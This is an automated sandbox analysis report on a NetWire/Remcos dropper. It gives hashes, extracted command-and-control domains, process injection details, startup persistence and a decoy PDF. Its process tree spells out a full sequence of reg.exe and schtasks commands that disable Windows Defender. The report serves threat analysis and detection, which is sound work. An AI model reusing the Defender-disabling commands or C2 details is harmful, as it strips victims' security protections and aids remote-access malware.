netwire | daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7v20201028
submitted
12-11-2020 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
Size

15.0MB
MD5

59a413614e91e86b933a42e4abdf1d43
SHA1

2d4ae51600e384dfcc8c054ff8c798055d008f87
SHA256

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4
SHA512

1e771d3c37f9035f4a813e062c9327bc1a14e34a29aee4bced9613555bb684c581cf121a83f5daa0e4a7e1ac2b430c34b3f190171d4f8a50f4f89bfdb8b6a93c

Score

10^/10

netwire remcos botnet evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

roxy.dynalias.net:3297

regiskm67.buyshouses.net:3297

dico.is-a-liberal.com:3297

neverdiemosole.is-a-doctor.com:3297

zeusnodie.mypets.ws:3297

nvdiedicobies.is-a-hard-worker.com:3297

nvdieroxy.kicks-ass.net:3297

nvdiedicozeuse.webhop.org:3297

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

NetWire RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/memory/412-68-0x0000000000400000-0x0000000000425000-memory.dmp	netwire
behavioral1/memory/412-69-0x0000000000402570-mapping.dmp	netwire
behavioral1/memory/412-71-0x0000000000400000-0x0000000000425000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Executes dropped EXE 3 IoCs

pid	Process
1564	EbookReaderMui.exe
2044	EbookRplg.exe
1816	EbookNplg.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe

Loads dropped DLL 11 IoCs

pid	Process
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

Modifies service 2 TTPs 9 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter	reg.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2044 set thread context of 988	2044	EbookRplg.exe	64
PID 1816 set thread context of 412	1816	EbookNplg.exe	65

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1816	EbookNplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
1816	EbookNplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe
2044	EbookRplg.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1684	AcroRd32.exe
988	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1816	EbookNplg.exe
Token: SeDebugPrivilege	2044	EbookRplg.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1684	AcroRd32.exe
1684	AcroRd32.exe
1684	AcroRd32.exe
988	RegAsm.exe

Suspicious use of WriteProcessMemory 141 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	26
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	26
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	26
PID 1924 wrote to memory of 1564	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	26
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	28
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	28
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	28
PID 1924 wrote to memory of 2044	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	28
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1924 wrote to memory of 1816	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	29
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	30
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	30
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	30
PID 1564 wrote to memory of 1732	1564	EbookReaderMui.exe	30
PID 1732 wrote to memory of 1712	1732	cmd.exe	31
PID 1732 wrote to memory of 1712	1732	cmd.exe	31
PID 1732 wrote to memory of 1712	1732	cmd.exe	31
PID 1732 wrote to memory of 108	1732	cmd.exe	32
PID 1732 wrote to memory of 108	1732	cmd.exe	32
PID 1732 wrote to memory of 108	1732	cmd.exe	32
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	33
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	33
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	33
PID 1924 wrote to memory of 1684	1924	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	33
PID 1732 wrote to memory of 1648	1732	cmd.exe	34
PID 1732 wrote to memory of 1648	1732	cmd.exe	34
PID 1732 wrote to memory of 1648	1732	cmd.exe	34
PID 1732 wrote to memory of 1676	1732	cmd.exe	35
PID 1732 wrote to memory of 1676	1732	cmd.exe	35
PID 1732 wrote to memory of 1676	1732	cmd.exe	35
PID 1732 wrote to memory of 324	1732	cmd.exe	36
PID 1732 wrote to memory of 324	1732	cmd.exe	36
PID 1732 wrote to memory of 324	1732	cmd.exe	36
PID 1732 wrote to memory of 744	1732	cmd.exe	37
PID 1732 wrote to memory of 744	1732	cmd.exe	37
PID 1732 wrote to memory of 744	1732	cmd.exe	37
PID 1732 wrote to memory of 1756	1732	cmd.exe	38
PID 1732 wrote to memory of 1756	1732	cmd.exe	38
PID 1732 wrote to memory of 1756	1732	cmd.exe	38
PID 1732 wrote to memory of 748	1732	cmd.exe	39
PID 1732 wrote to memory of 748	1732	cmd.exe	39
PID 1732 wrote to memory of 748	1732	cmd.exe	39
PID 1732 wrote to memory of 1088	1732	cmd.exe	40
PID 1732 wrote to memory of 1088	1732	cmd.exe	40
PID 1732 wrote to memory of 1088	1732	cmd.exe	40
PID 1732 wrote to memory of 1896	1732	cmd.exe	41
PID 1732 wrote to memory of 1896	1732	cmd.exe	41
PID 1732 wrote to memory of 1896	1732	cmd.exe	41
PID 1732 wrote to memory of 1844	1732	cmd.exe	42
PID 1732 wrote to memory of 1844	1732	cmd.exe	42
PID 1732 wrote to memory of 1844	1732	cmd.exe	42
PID 1732 wrote to memory of 1400	1732	cmd.exe	43
PID 1732 wrote to memory of 1400	1732	cmd.exe	43
PID 1732 wrote to memory of 1400	1732	cmd.exe	43
PID 1732 wrote to memory of 920	1732	cmd.exe	44
PID 1732 wrote to memory of 920	1732	cmd.exe	44
PID 1732 wrote to memory of 920	1732	cmd.exe	44
PID 1732 wrote to memory of 360	1732	cmd.exe	45
PID 1732 wrote to memory of 360	1732	cmd.exe	45
PID 1732 wrote to memory of 360	1732	cmd.exe	45
PID 1732 wrote to memory of 572	1732	cmd.exe	46
PID 1732 wrote to memory of 572	1732	cmd.exe	46
PID 1732 wrote to memory of 572	1732	cmd.exe	46
PID 1732 wrote to memory of 1464	1732	cmd.exe	47
PID 1732 wrote to memory of 1464	1732	cmd.exe	47
PID 1732 wrote to memory of 1464	1732	cmd.exe	47
PID 1732 wrote to memory of 316	1732	cmd.exe	48
PID 1732 wrote to memory of 316	1732	cmd.exe	48
PID 1732 wrote to memory of 316	1732	cmd.exe	48
PID 1732 wrote to memory of 616	1732	cmd.exe	49
PID 1732 wrote to memory of 616	1732	cmd.exe	49
PID 1732 wrote to memory of 616	1732	cmd.exe	49
PID 1732 wrote to memory of 736	1732	cmd.exe	50
PID 1732 wrote to memory of 736	1732	cmd.exe	50
PID 1732 wrote to memory of 736	1732	cmd.exe	50
PID 1732 wrote to memory of 520	1732	cmd.exe	51
PID 1732 wrote to memory of 520	1732	cmd.exe	51
PID 1732 wrote to memory of 520	1732	cmd.exe	51
PID 1732 wrote to memory of 540	1732	cmd.exe	52
PID 1732 wrote to memory of 540	1732	cmd.exe	52
PID 1732 wrote to memory of 540	1732	cmd.exe	52
PID 1732 wrote to memory of 676	1732	cmd.exe	53
PID 1732 wrote to memory of 676	1732	cmd.exe	53
PID 1732 wrote to memory of 676	1732	cmd.exe	53
PID 1732 wrote to memory of 1748	1732	cmd.exe	54
PID 1732 wrote to memory of 1748	1732	cmd.exe	54
PID 1732 wrote to memory of 1748	1732	cmd.exe	54
PID 1732 wrote to memory of 1612	1732	cmd.exe	55
PID 1732 wrote to memory of 1612	1732	cmd.exe	55
PID 1732 wrote to memory of 1612	1732	cmd.exe	55
PID 1732 wrote to memory of 1904	1732	cmd.exe	56
PID 1732 wrote to memory of 1904	1732	cmd.exe	56
PID 1732 wrote to memory of 1904	1732	cmd.exe	56
PID 1732 wrote to memory of 1064	1732	cmd.exe	57
PID 1732 wrote to memory of 1064	1732	cmd.exe	57
PID 1732 wrote to memory of 1064	1732	cmd.exe	57
PID 1732 wrote to memory of 1600	1732	cmd.exe	58
PID 1732 wrote to memory of 1600	1732	cmd.exe	58
PID 1732 wrote to memory of 1600	1732	cmd.exe	58
PID 1732 wrote to memory of 1704	1732	cmd.exe	59
PID 1732 wrote to memory of 1704	1732	cmd.exe	59
PID 1732 wrote to memory of 1704	1732	cmd.exe	59
PID 1732 wrote to memory of 1432	1732	cmd.exe	60
PID 1732 wrote to memory of 1432	1732	cmd.exe	60
PID 1732 wrote to memory of 1432	1732	cmd.exe	60
PID 1732 wrote to memory of 1964	1732	cmd.exe	61
PID 1732 wrote to memory of 1964	1732	cmd.exe	61
PID 1732 wrote to memory of 1964	1732	cmd.exe	61
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 2044 wrote to memory of 988	2044	EbookRplg.exe	64
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65
PID 1816 wrote to memory of 412	1816	EbookNplg.exe	65

C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
"C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
  "C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\12E5.tmp\12E6.tmp\12E7.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1712
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:108
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:1676
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:324
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:744
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:1756
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:748
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:1088
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:1896
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:1844
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:1400
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:920
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:360
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:572
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:1464
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:316
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:616
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:736
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:520
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:540
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:676
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1748
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1612
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1904
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1064
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1600
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1704
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1432
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      Modifies service
      PID:1964
- C:\Users\Admin\AppData\Roaming\EbookRplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:988
- C:\Users\Admin\AppData\Roaming\EbookNplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:412
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1684

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/412-71-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/412-68-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/988-67-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/988-72-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1816-58-0x0000000000970000-0x000000000099D000-memory.dmp

Filesize
180KB

Download
memory/1816-21-0x0000000074030000-0x000000007471E000-memory.dmp

Filesize
6.9MB

Download
memory/1816-45-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

Filesize
4KB

Download
memory/1816-65-0x0000000000C90000-0x0000000000C93000-memory.dmp

Filesize
12KB

Download
memory/1816-63-0x00000000009F0000-0x00000000009F5000-memory.dmp

Filesize
20KB

Download
memory/2044-61-0x00000000002B0000-0x00000000002B5000-memory.dmp

Filesize
20KB

Download
memory/2044-59-0x0000000000D20000-0x0000000000D51000-memory.dmp

Filesize
196KB

Download
memory/2044-23-0x0000000074030000-0x000000007471E000-memory.dmp

Filesize
6.9MB

Download
memory/2044-46-0x0000000000F70000-0x0000000000F71000-memory.dmp

Filesize
4KB

Download